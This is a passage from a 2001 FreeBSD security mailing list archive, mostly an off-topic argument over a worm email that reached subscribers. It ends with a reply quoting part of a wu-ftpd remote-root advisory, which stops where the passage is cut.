I think you should quit blaming the admins. A lot of people got this
virus<br>
even though they had virus scanners in place. Sometimes sh*t happens.
Deal<br>
with it.<br><br>
My 2 cents.<br><br>
Chuck<br><br>
-----Original Message-----<br>
From: owner-freebsd-security@FreeBSD.ORG<br>
[<a href="mailto:owner-freebsd-security@FreeBSD.ORG" eudora="autourl">mailto:owner-freebsd-security@FreeBSD.ORG</a>]On
Behalf Of webmaster<br>
Sent: Tuesday, December 04, 2001 4:16 PM<br>
To: Owner-Freebsd-Security<br>
Subject: RE: Hi<br><br>
<br><br>
If you are not capable of preventing virus infection from a known
unsafe<br>
attachment or file type, You should probably go back to the basics and
spare<br>
the rest of us on this list by taking us out of your address
book.<br><br>
Thanks<br>
Michael<br><br>
-----Original Message-----<br>
From: owner-freebsd-security@FreeBSD.ORG<br>
[<a href="mailto:owner-freebsd-security@FreeBSD.ORG" eudora="autourl">mailto:owner-freebsd-security@FreeBSD.ORG</a>]On
Behalf Of Baldwin, Peter<br>
Sent: Tuesday, December 04, 2001 4:18 PM<br>
To: local.freebsd.security<br>
Subject: Hi<br><br>
<br>
How are you ?<br>
When I saw this screen saver, I immediately thought about you<br>
I am in a harry, I promise you will love it!<br><br>
<br><br>
To Unsubscribe: send mail to majordomo@FreeBSD.org<br>
with &quot;unsubscribe freebsd-security&quot; in the body of the
message<br><br>
<br>
To Unsubscribe: send mail to majordomo@FreeBSD.org<br>
with &quot;unsubscribe freebsd-security&quot; in the body of the
message</blockquote>
<x-sigsep><p></x-sigsep>
<tt><font face="Courier New, Courier" color="#800080">---<br>
</font><font face="Courier New CE, Courier" color="#0000FF">Landon
Stewart<br><br>
</font><font face="Fixedsys" color="#C0C0C0">Right of Use
Disclaimer:<br>
&quot;The sender intends this message for a specific recipient and, as it
may contain information that is privileged or confidential, any use,
dissemination, forwarding, or copying by anyone without permission from
the sender is prohibited. Personal e-mail may contain views that are not
necessarily those of the company.&quot;<br>
</font></html>

--=====================_2003380==_.ALT--


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:43:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freebie.atkielski.com (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14])
	by hub.freebsd.org (Postfix) with ESMTP id F30BF37B416
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 14:43:28 -0800 (PST)
Received: from contactdish (contactdish.atkielski.com [10.0.0.10])
	by freebie.atkielski.com (8.11.3/8.11.3) with SMTP id fB4Mh8x83666;
	Tue, 4 Dec 2001 23:43:08 +0100 (CET)
	(envelope-from anthony@freebie.atkielski.com)
Message-ID: <015001c17d15$0c97e170$0a00000a@atkielski.com>
From: "Anthony Atkielski" <anthony@freebie.atkielski.com>
To: "Colin Faber" <cfaber@fpsn.net>, <carock@epctech.com>
Cc: <freebsd-security@freebsd.org>
References: <JDEAIDLKPMMILNJHADGCKEAPEGAA.carock@epctech.com> <3C0D4FBD.17F0BA07@fpsn.net>
Subject: Re: Hi (off-topic)
Date: Tue, 4 Dec 2001 23:43:08 +0100
Organization: Anthony's Home Page (development site)
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

A simple solution:  Don't open files with suspicious attachments.  That's what I do.

----- Original Message ----- 
From: "Colin Faber" <cfaber@fpsn.net>
To: <carock@epctech.com>
Cc: "Owner-Freebsd-Security" <freebsd-security@FreeBSD.ORG>
Sent: Tuesday, December 04, 2001 23:35
Subject: Re: Hi (off-topic)


> Possible solution, block any messages with MS based files? ;-)
> 
> 
> 
> Chuck Rock wrote:
> > 
> > It's the same as saying if you can't protect your own equipment then stop
> > using a computer.
> > 
> > I think you should quit blaming the admins. A lot of people got this virus
> > even though they had virus scanners in place. Sometimes sh*t happens. Deal
> > with it.
> > 
> > My 2 cents.
> > 
> > Chuck
> > 
> > -----Original Message-----
> > From: owner-freebsd-security@FreeBSD.ORG
> > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of webmaster
> > Sent: Tuesday, December 04, 2001 4:16 PM
> > To: Owner-Freebsd-Security
> > Subject: RE: Hi
> > 
> > If you are not capable of preventing virus infection from a known unsafe
> > attachment or file type, You should probably go back to the basics and spare
> > the rest of us on this list by taking us out of your address book.
> > 
> > Thanks
> > Michael
> > 
> > -----Original Message-----
> > From: owner-freebsd-security@FreeBSD.ORG
> > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Baldwin, Peter
> > Sent: Tuesday, December 04, 2001 4:18 PM
> > To: local.freebsd.security
> > Subject: Hi
> > 
> > How are you ?
> > When I saw this screen saver, I immediately thought about you
> > I am in a harry, I promise you will love it!
> > 
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> > 
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> 
> -- 
> Colin Faber
> (303) 859-1491
> fpsn.net, Inc.
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
> 


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:44:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from switchblade.cyberpunkz.org (switchblade.cyberpunkz.org [198.174.169.125])
	by hub.freebsd.org (Postfix) with ESMTP id 309FD37B417
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 14:44:15 -0800 (PST)
Received: from switchblade.cyberpunkz.org (rob@localhost.cyberpunkz.org [127.0.0.1])
	by switchblade.cyberpunkz.org (8.12.1/CpA-TLS-1.2.12-1) with ESMTP id fB4Mi49W030346
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO);
	Tue, 4 Dec 2001 16:44:09 -0600 (CST)?g
	(envelope-from rob@switchblade.cyberpunkz.org)�
Posted-Date: Tue, 4 Dec 2001 16:44:09 -0600 (CST)
Abuse-Contact: abuse@cyberpunkz.org
Received: (from rob@localhost)
	by switchblade.cyberpunkz.org (8.12.1/8.12.1/Submit) id fB4Mi3dd030344;
	Tue, 4 Dec 2001 16:44:03 -0600 (CST)?g
	(envelope-from rob)
Date: Tue, 4 Dec 2001 16:44:03 -0600
From: Rob Andrews <rob@cyberpunkz.org>
To: webmaster <webmaster@donfishback.com>
Cc: Owner-Freebsd-Security <freebsd-security@FreeBSD.ORG>
Subject: Re: Hi
Message-ID: <20011204164403.A11144@switchblade.cyberpunkz.org>
References: <KKEDJAMJCHBEINDLGJGGMEODDGAA.webmaster@donfishback.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="9amGYk9869ThD9tj"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <KKEDJAMJCHBEINDLGJGGMEODDGAA.webmaster@donfishback.com>; from webmaster@donfishback.com on Tue, Dec 04, 2001 at 05:15:30PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--9amGYk9869ThD9tj
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline


Correct me if I am wrong..  Isn't this the freebsd security list?  Did
it suddenly change to flame wars while I was away for the day?

Rob Andrews
Admin | Owner
http://cyberpunkz.org/

--9amGYk9869ThD9tj
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8DVGzAXwJ9YLqJJURAgGwAJ0YFdJ3RyfkxG/oObo2Nspw/hbxjgCeNpe/
CqVYQ3nIozcEK9Mjfnmyhzk=
=XnM/
-----END PGP SIGNATURE-----

--9amGYk9869ThD9tj--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:45:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.donfishback.com (www.donfishback.com [206.28.50.220])
	by hub.freebsd.org (Postfix) with ESMTP id 1C3E437B42A
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 14:44:48 -0800 (PST)
Received: from bryanslaptop (bdsl.66.12.25.162.gte.net [66.12.25.162])
	by www.donfishback.com (8.11.3/8.11.3) with ESMTP id fB4MiLe96290
	for <freebsd-security@FreeBSD.ORG>; Tue, 4 Dec 2001 17:44:21 -0500 (EST)
	(envelope-from webmaster@donfishback.com)
From: "webmaster" <webmaster@donfishback.com>
To: "Owner-Freebsd-Security" <freebsd-security@FreeBSD.ORG>
Subject: RE: Hi (off-topic)
Date: Tue, 4 Dec 2001 17:44:39 -0500
Message-ID: <KKEDJAMJCHBEINDLGJGGEEOGDGAA.webmaster@donfishback.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
In-Reply-To: <JDEAIDLKPMMILNJHADGCKEAPEGAA.carock@epctech.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I'm not blaming list admins at all.  I am talking about the guy/gal who
actually opened the infected file and has the list address in their mailbox.
I know sh*t happens.  But it usually happens to the same people over and
over.  I would rather they get the list address out of their address book,
so I don't have to walk in the sh*t next time.

Michael

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Chuck Rock
Sent: Tuesday, December 04, 2001 5:30 PM
To: Owner-Freebsd-Security
Subject: RE: Hi (off-topic)


It's the same as saying if you can't protect your own equipment then stop
using a computer.

I think you should quit blaming the admins. A lot of people got this virus
even though they had virus scanners in place. Sometimes sh*t happens. Deal
with it.

My 2 cents.

Chuck

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of webmaster
Sent: Tuesday, December 04, 2001 4:16 PM
To: Owner-Freebsd-Security
Subject: RE: Hi


If you are not capable of preventing virus infection from a known unsafe
attachment or file type, You should probably go back to the basics and spare
the rest of us on this list by taking us out of your address book.

Thanks
Michael

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Baldwin, Peter
Sent: Tuesday, December 04, 2001 4:18 PM
To: local.freebsd.security
Subject: Hi


How are you ?
When I saw this screen saver, I immediately thought about you
I am in a harry, I promise you will love it!


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:48:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.conwaycorp.net (ns.conwaycorp.net [24.144.1.3])
	by hub.freebsd.org (Postfix) with SMTP id E94A737B41E
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 14:48:02 -0800 (PST)
Received: (qmail 16235 invoked from network); 4 Dec 2001 22:39:20 -0000
Received: from unknown (HELO win2ks) (176.1.2.20)
  by mail.conwaycorp.net with SMTP; 4 Dec 2001 22:39:20 -0000
Message-ID: <00ed01c17d14$b759ad10$191a9018@win2ks>
From: "Chad Bishop" <cbishop@conwaycorp.net>
To: <freebsd-security@freebsd.org>
References: <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz>
Subject: Re: Mail list is posting gone virus!!!!
Date: Tue, 4 Dec 2001 16:40:46 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

unsubscribe freebsd-security-advertisements@freebsd.org


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:49: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57])
	by hub.freebsd.org (Postfix) with ESMTP id 1649537B419
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 14:48:47 -0800 (PST)
Received: from fpsn.net (control.fpsn.net [63.224.69.60])
	(authenticated)
	by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id fB4MmbV94711;
	Tue, 4 Dec 2001 15:48:37 -0700 (MST)
Message-ID: <3C0D52A5.5EF1AD21@fpsn.net>
Date: Tue, 04 Dec 2001 15:48:05 -0700
From: Colin Faber <cfaber@fpsn.net>
Organization: fpsn.net, Inc.
X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Anthony Atkielski <anthony@freebie.atkielski.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Hi (off-topic)
References: <JDEAIDLKPMMILNJHADGCKEAPEGAA.carock@epctech.com> <3C0D4FBD.17F0BA07@fpsn.net> <015001c17d15$0c97e170$0a00000a@atkielski.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

That's not really a good solution given the massive amount of bandwidth
wasted every time one of these attachments is sent.

The goal should be to stop them at the source not at the destination.


Anthony Atkielski wrote:
> 
> A simple solution:  Don't open files with suspicious attachments.  That's what I do.
> 
> ----- Original Message -----
> From: "Colin Faber" <cfaber@fpsn.net>
> To: <carock@epctech.com>
> Cc: "Owner-Freebsd-Security" <freebsd-security@FreeBSD.ORG>
> Sent: Tuesday, December 04, 2001 23:35
> Subject: Re: Hi (off-topic)
> 
> > Possible solution, block any messages with MS based files? ;-)
> >
> >
> >
> > Chuck Rock wrote:
> > >
> > > It's the same as saying if you can't protect your own equipment then stop
> > > using a computer.
> > >
> > > I think you should quit blaming the admins. A lot of people got this virus
> > > even though they had virus scanners in place. Sometimes sh*t happens. Deal
> > > with it.
> > >
> > > My 2 cents.
> > >
> > > Chuck
> > >
> > > -----Original Message-----
> > > From: owner-freebsd-security@FreeBSD.ORG
> > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of webmaster
> > > Sent: Tuesday, December 04, 2001 4:16 PM
> > > To: Owner-Freebsd-Security
> > > Subject: RE: Hi
> > >
> > > If you are not capable of preventing virus infection from a known unsafe
> > > attachment or file type, You should probably go back to the basics and spare
> > > the rest of us on this list by taking us out of your address book.
> > >
> > > Thanks
> > > Michael
> > >
> > > -----Original Message-----
> > > From: owner-freebsd-security@FreeBSD.ORG
> > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Baldwin, Peter
> > > Sent: Tuesday, December 04, 2001 4:18 PM
> > > To: local.freebsd.security
> > > Subject: Hi
> > >
> > > How are you ?
> > > When I saw this screen saver, I immediately thought about you
> > > I am in a harry, I promise you will love it!
> > >
> > > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > > with "unsubscribe freebsd-security" in the body of the message
> > >
> > > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > > with "unsubscribe freebsd-security" in the body of the message
> >
> > --
> > Colin Faber
> > (303) 859-1491
> > fpsn.net, Inc.
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> >
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

-- 
Colin Faber
(303) 859-1491
fpsn.net, Inc.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:51:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1])
	by hub.freebsd.org (Postfix) with ESMTP id 206A937B41D
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 14:51:06 -0800 (PST)
Received: (from root@localhost)
	by cage.simianscience.com (8.11.6/8.11.6) id fB4Mp5W25682
	for freebsd-security@freebsd.org; Tue, 4 Dec 2001 17:51:05 -0500 (EST)
	(envelope-from mike@sentex.net)
Received: from chimp.sentex.net (fcage [192.168.0.2])
	by cage.simianscience.com (8.11.6/8.11.6av) with ESMTP id fB4Mp2k25674
	for <freebsd-security@FreeBSD.ORG>; Tue, 4 Dec 2001 17:51:02 -0500 (EST)
	(envelope-from mike@sentex.net)
Message-Id: <5.1.0.14.0.20011204174731.0510a110@192.168.0.12>
X-Sender: mdtancsa@192.168.0.12
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 04 Dec 2001 17:51:01 -0500
To: freebsd-security@freebsd.org
From: Mike Tancsa <mike@sentex.net>
Subject: Virus scanners (was RE: Hi (off-topic))
In-Reply-To: <JDEAIDLKPMMILNJHADGCKEAPEGAA.carock@epctech.com>
References: <KKEDJAMJCHBEINDLGJGGMEODDGAA.webmaster@donfishback.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

At 04:29 PM 12/4/2001 -0600, Chuck Rock wrote:
>It's the same as saying if you can't protect your own equipment then stop
>using a computer.
>
>I think you should quit blaming the admins. A lot of people got this virus
>even though they had virus scanners in place. Sometimes sh*t happens. Deal
>with it.

Especially since this particular virus propagation has been very fast.  In 
order to block it with NAI's product I had to use the extra.dat file as 
they have yet to release the production .dat file that has the 
signature.  Combine that with the fact that many non tech people think that 
because a company has a virus scanner in place, an attachment is 
automatically safe to open....

         ---Mike
--------------------------------------------------------------------
Mike Tancsa,                          	          tel +1 519 651 3400
Sentex Communications,     			  mike@sentex.net
Providing Internet since 1994                    www.sentex.net
Cambridge, Ontario Canada			  www.sentex.net/mike


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 16:32: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freebie.atkielski.com (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14])
	by hub.freebsd.org (Postfix) with ESMTP id 996B537B444
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 16:31:54 -0800 (PST)
Received: from contactdish (contactdish.atkielski.com [10.0.0.10])
	by freebie.atkielski.com (8.11.3/8.11.3) with SMTP id fB50Vix83974;
	Wed, 5 Dec 2001 01:31:44 +0100 (CET)
	(envelope-from anthony@freebie.atkielski.com)
Message-ID: <017c01c17d24$37e9d310$0a00000a@atkielski.com>
From: "Anthony Atkielski" <anthony@freebie.atkielski.com>
To: "Colin Faber" <cfaber@fpsn.net>
Cc: <freebsd-security@FreeBSD.ORG>
References: <JDEAIDLKPMMILNJHADGCKEAPEGAA.carock@epctech.com> <3C0D4FBD.17F0BA07@fpsn.net> <015001c17d15$0c97e170$0a00000a@atkielski.com> <3C0D52A5.5EF1AD21@fpsn.net>
Subject: Re: Hi (off-topic)
Date: Wed, 5 Dec 2001 01:31:44 +0100
Organization: Anthony's Home Page (development site)
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Perhaps from a global standpoint, yes, but from an individual user standpoint, the goal is to prevent infection of one's machine.
Not opening strange attachments is sufficient to prevent the spread of almost all viruses.

----- Original Message -----
From: "Colin Faber" <cfaber@fpsn.net>
To: "Anthony Atkielski" <anthony@freebie.atkielski.com>
Cc: <freebsd-security@FreeBSD.ORG>
Sent: Tuesday, December 04, 2001 23:48
Subject: Re: Hi (off-topic)


> That's not really a good solution given the massive amount of bandwidth
> wasted every time one of these attachments is sent.
>
> The goal should be to stop them at the source not at the destination.
>
>
>
> Anthony Atkielski wrote:
> >
> > A simple solution:  Don't open files with suspicious attachments.  That's what I do.
> >
> > ----- Original Message -----
> > From: "Colin Faber" <cfaber@fpsn.net>
> > To: <carock@epctech.com>
> > Cc: "Owner-Freebsd-Security" <freebsd-security@FreeBSD.ORG>
> > Sent: Tuesday, December 04, 2001 23:35
> > Subject: Re: Hi (off-topic)
> >
> > > Possible solution, block any messages with MS based files? ;-)


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 16:34: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2])
	by hub.freebsd.org (Postfix) with ESMTP id 7CDCA37B41A
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 16:34:04 -0800 (PST)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2])
	by lariat.org (8.9.3/8.9.3) with ESMTP id RAA26148;
	Tue, 4 Dec 2001 17:33:50 -0700 (MST)
Message-Id: <4.3.2.7.2.20011204172959.04d112e0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Tue, 04 Dec 2001 17:33:45 -0700
To: <JGordon@Alliante.com>, <freebsd-security@FreeBSD.ORG>
From: Brett Glass <brett@lariat.org>
Subject: Re: Mail list is posting gone virus!!!!
In-Reply-To: <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com>
References: <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

At 03:11 PM 12/4/2001, "J e f f r e y   D .   G o r d o n"
(a "space cadet?") wrote:

>   To my knowledge the FreeBSD mailing lists have too much traffic to run a
>virus checker (and I don't blame them for not checking if they don't), 

I do not believe that this is a valid excuse. Checking for a virus
or worm costs MUCH less than sending it to large numbers of users.

>plus his virus pattern was RELEASED THIS AFTERNOON.

Also no excuse. Our heuristic checker caught the very first copy
(See http://www.brettglass.com/spam/paper.html) and would run
just fine on the FreeBSD mail servers.

Also, one should NEVER rely on antivirus vendors to provide patterns
in a timely fashion. It is in their interest to delay deployment of 
patterns so as to allow users to suffer a bit; it increases their 
sales. McAfee is the worst offender here.

--Brett Glass


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 16:58: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66])
	by hub.freebsd.org (Postfix) with ESMTP
	id D47DA37B417; Tue,  4 Dec 2001 16:57:52 -0800 (PST)
Received: (from str@localhost)
	by giganda.komkon.org (8.11.3/8.11.3) id fB50vh419563;
	Tue, 4 Dec 2001 19:57:43 -0500 (EST)
	(envelope-from str)
Date: Tue, 4 Dec 2001 19:57:43 -0500 (EST)
From: Igor Roshchin <str@giganda.komkon.org>
Message-Id: <200112050057.fB50vh419563@giganda.komkon.org>
To: security-officer@freebsd.org, security@freebsd.org
Subject: Re: FreeBSD Ports Security Advisory FreeBSD-SA-01:64.wu-ftpd
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


It appears that between the time the initial patch was inplemented,
and the time this advisory has been released, a different set of patches was
made, which appeares to be based on the patches released by the 
WU-FTPD team (Nov. 29 or 30).
This patch brought the patch level to 8 (2.6.1_8).
So by the time the advisory was released, it had information that is
somewhat out-of-date.
Probably, it need correction.

Also, ftp.freebsd.org still has old, vulnerable, versions of the packages:
-rw-r--r--  1 1006  1006  107717 Nov 28 09:23 wu-ftpd-2.6.1_6.tgz
in /pub/FreeBSD/ports/i386/packages-4-stable/All 
and 
-rw-r--r--  1 1006  1006  107869 Nov 22 09:59 wu-ftpd-2.6.1_6.tgz 
in /pub/FreeBSD/ports/i386/packages-5-current/All


Regards,

Igor


Igor Roshchin
KomKon Sites


> From owner-freebsd-security@FreeBSD.ORG Tue Dec  4 14:02:15 2001
> Date: Tue, 4 Dec 2001 10:54:18 -0800 (PST)
> From: FreeBSD Security Advisories <security-advisories@FreeBSD.ORG>
> To: FreeBSD Security Advisories <security-advisories@FreeBSD.ORG>
> Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:64.wu-ftpd
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> =============================================================================
> FreeBSD-SA-01:64                                           Security Advisory
>                                                                 FreeBSD, Inc.
>
> Topic:          wu-ftpd port contains remote root compromise
>
> Category:       ports
> Module:         wu-ftpd
> Announced:      2001-12-04
> Credits:        CORE Security Technologies
>                 Contact: Ivan Arce (iarce@corest.com)
> Affects:        Ports collection prior to the correction date
> Corrected:      2001-11-28 10:52:26 UTC
> FreeBSD only:   NO
>
> I.   Background
>
> wu-ftpd is a popular full-featured FTP server.
>
> II.  Problem Description
>
> The wu-ftpd port, versions prior to wu-ftpd-2.6.1_7, contains a
> vulnerability which allows FTP users, both anonymous FTP users and
> those with valid accounts, to execute arbitrary code as root on
> the local machine.  This may be accomplished by inserting invalid
> globbing parameters which are incorrectly parsed by the FTP server
> into command input.
>
> The wu-ftpd port is not installed by default, nor is it "part of
